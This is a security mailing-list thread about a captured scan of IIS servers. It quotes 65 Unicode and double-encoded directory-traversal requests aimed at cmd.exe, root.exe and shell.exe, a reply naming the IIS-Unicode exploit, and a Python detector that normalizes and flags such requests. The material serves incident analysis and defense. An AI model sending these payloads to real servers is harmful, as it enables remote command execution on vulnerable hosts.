----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts. The two-day
Training features 6 hands-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches. Deadline for the best rates is April 25. Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
----------------------------------------------------------------------------
This is a slightly modified version of the old MS IIS-Unicode exploit, see
here:
http://downloads.securityfocus.com/vulnerabilities/exploits/iis-kabom.php
Reinhard Handwerker
Internet Security Systems
Atlanta, GA
>From: Mark Embrich <mark_embrich (at) yahoo (dot) com [email concealed]>
>To: incidents (at) securityfocus (dot) com [email concealed]
>Subject: New attack or old Vulnerability Scanner?
>
>Hello,
>
>Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
>Note that it also included: "User-Agent:.Mozilla/3.0.
>(compatible;.Indy.Library)...."
>For which my googling tells me that this attack/scanner is probably
>built using Borland Delphi/C++ Builder suite.
>
>I've so far received 3 of these from 2 different IP addresses.
>The first two were from a Comcast cable user.
>The last was from a Cox Communications IP.
>
>Thanks,
>Mark Embrich
>
>0. Scan TCP 80
>1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>3. GET./_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>8. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>21. GET./msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>23. GET./msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>24. GET./MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>25. GET./msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>28. GET./msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>29. GET./msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>30. GET./msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>31. GET./msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
>33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
>34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
>35. GET./PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>36. GET./PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>37. GET./PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>38. GET./PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>39. GET./Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>40. GET./Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>41. GET./Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>42. GET./Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>43. GET./samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>46. GET./scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>47. GET./scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>48. GET./scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>60. GET./scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>61. GET./scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>62. GET./scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>63. GET./scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
>65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..
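A defender's canonicalizer for request lines like the ones quoted above, added here as an example and not code from the original thread or from the exploit it references: it percent-decodes until the path stops changing (so %255c and %%35%63 collapse to a backslash), folds the overlong UTF-8 forms (%c0%af, %e0%80%af, ...) to the ASCII byte they hide, and then reports traversal into cmd.exe, root.exe or shell.exe. It assumes the capture's "." stands for a space or CRLF, and SAMPLE is constructed from two of the quoted lines plus one benign request.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 lead bytes from the log -> number of continuation bytes.
OVERLONG_LEADS = {0xC0: 1, 0xC1: 1, 0xE0: 2, 0xF0: 3, 0xF8: 4, 0xFC: 5}
SHELL_TARGET = re.compile(r"(?i)/(winnt/system32/cmd|root|shell)\.exe\b")
REQUEST_LINE = re.compile(r"GET[ .](\S+?)[ .]HTTP/")  # "." is the capture's space
# Sample input: two lines quoted from the log above plus one constructed benign GET.
SAMPLE = ["GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..",
          "GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..",
          "GET./index.html.HTTP/1.1.."]

def fold_overlong_utf8(data: bytes) -> bytes:
    """Collapse overlong UTF-8 (C0 AF -> '/', C1 9C -> '\\') like unpatched IIS did."""
    out, i = bytearray(), 0
    while i < len(data):
        lead, n = data[i], OVERLONG_LEADS.get(data[i], 0)
        tail = data[i + 1:i + 1 + n]
        if n and len(tail) == n and all(0x80 <= b <= 0xBF for b in tail):
            cp = lead & (0x7F >> (n + 1))  # payload bits of the lead byte
            for b in tail:
                cp = (cp << 6) | (b & 0x3F)
            if cp < 0x80:  # only fold when the hidden code point is ASCII
                out.append(cp)
                i += 1 + n
                continue
        out.append(lead)
        i += 1
    return bytes(out)

def normalize_path(raw: str, max_rounds: int = 3) -> tuple:
    """Percent-decode until stable (%255c, %%35%63), then fold overlong UTF-8."""
    tricks, data, rounds = set(), raw.encode("latin-1"), 0
    while rounds < max_rounds and unquote_to_bytes(data) != data:
        data, rounds = unquote_to_bytes(data), rounds + 1
    if rounds > 1:
        tricks.add("double-encoding")
    folded = fold_overlong_utf8(data)
    if folded != data:
        tricks.add("overlong-utf8")
    return folded.decode("latin-1").replace("\\", "/"), tricks

def classify_request(line: str) -> dict:
    path, tricks = normalize_path(REQUEST_LINE.match(line).group(1))
    if "/../" in path:
        tricks.add("traversal")
    if SHELL_TARGET.search(path):
        tricks.add("command-interpreter")
    return {"path": path, "indicators": sorted(tricks),
            "alert": "command-interpreter" in tricks}
```

Lines with broken hex such as %c0%9v do not canonicalize to a traversal, but still alert on the cmd.exe target, which is the more reliable signal for this scanner.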